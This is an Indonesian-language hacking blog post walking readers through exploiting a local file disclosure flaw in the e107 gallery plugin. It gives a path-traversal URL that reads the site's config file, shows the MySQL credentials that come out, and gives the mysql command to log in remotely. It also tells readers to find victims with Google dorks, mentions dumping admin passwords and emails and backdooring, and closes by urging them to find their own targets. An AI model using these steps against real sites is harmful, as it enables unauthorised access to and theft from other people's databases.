75n1.com

close
close

Follow by Email

e107 Gallery Local File Disclosure (LFD) Exploitation


e107 Gallery Local File Disclosure (LFD) Exploitation

Bug ini beberapa bulan lebih tua dari pada bug e107 yg lagi gencar2nya, yaitu Remote Code Execution pada contact form. But, saya akan mencoba menjelaskan bagaimana qt mengexploitasi bug LFD pada e107 gallery dan mendapatkan akses Remote Mysql.
Iyap, remote mysql. Saya akan menjelaskan bagaimana qt bisa masuk ke mysql server pada host sasaran dengan memanfaatkan bug LFD pada e107 gallery.
Banyak hal yg bisa qt peroleh dari sini mengakses database mysql nya. Misalnya ambil username dan password administrator, dumping email, backdooring, dll. saya g akan bagaimana melakukan itu semua, tapi saya akan menjelaskan bagaimana masuk ke sql srvernya.

Lets Action!

Seperti teknik exploitasi LFD biasanya. Hampir sama dengan LFI. bedanya di teknik ini, code yg di include tidak di eksekusi, namun di tampilkan. tekniknya sama persis seperti LFI.


bug.php?var=../../../../../../path/to/file/want/to/include

Bug LFD pada e107 gallery ini adalah: e107_plugins/my_gallery/image.php?file=

googling aja buat dapetin site yg vuln. pake dork /e107_plugins/ /my_gallery/ dll sesuai kreatifitas km.

Seperti yg saya katakan tadi, saya akan masuk ke mysql server pada host sasaran. Tentunya host sasaran yg vuln dengan bug ini.

Untuk dapat masuk ke mysql server, yg q butuhkan adalah hostname, username, dan password mysql pada host sasaran. Dengan bug LFD pada e107 gallery, saya akan mengambil config mysql nya.

http://ini.sasaran.com/e107_plugins/my_gallery/image.php?file=../../e107_config.php

dari situ, saya mendapatkan output image kosong. what? kosong? iya. itu kalau di lihat dengan mata telanjang. tapi setelah menyingkap tabir misteri source code nya, qt mendapatkan file e107_config.php

------- snip ---------
mySQLserver = 'mysql.sasaran.com';
mySQLuser = 'sasaran_usersql';
mySQLpassword = '357mnsss2';
mySQLdefaultdb = 'mdbase';
-------- snip ---------

yap, itulah yg tak butuhin. sekarang udah dapet. langkah terakhir adalah mengambil akses ke tuh mysql server. banyak cara untuk melakukanya. dengan membuat database connection dengan php, akses phpmyadmin, remote mysql server, dll. dalam contoh ini saya akan melakukan remote mysql server.

Untuk melakukan remote mysql, yg q butuhkan jelas aplikasi mysql. Untuk pengguna windows, bisa pakai mysql standart seperti yg satu paket ama phptriad, xampp, appserv, dkk. sedangkan command nya sama aja.

Key. Langsung aja konek ke mysql nya.

[array@silk array]$ mysql -h mysql.sasaran.com -u sasaran_usersql -p357mnss2 mdbase

Tunggu terkoneksi. SEtelah masuk command line, qt bisa langsung melakukan command2 mysql. Ambil data, dll. Pengetahuan tentang command mysql sangat penting disini.

Sory neh g ada live demo nya, soalnya sedang g cari target. Cari ndiri ya. Selamat mencoba.


Spesial Thanks: NoGe c0li Jack

-ArRay-
Labels: Exploitations

Thanks for reading e107 Gallery Local File Disclosure (LFD) Exploitation. Please share...!

0 Comment for "e107 Gallery Local File Disclosure (LFD) Exploitation"

Back To Top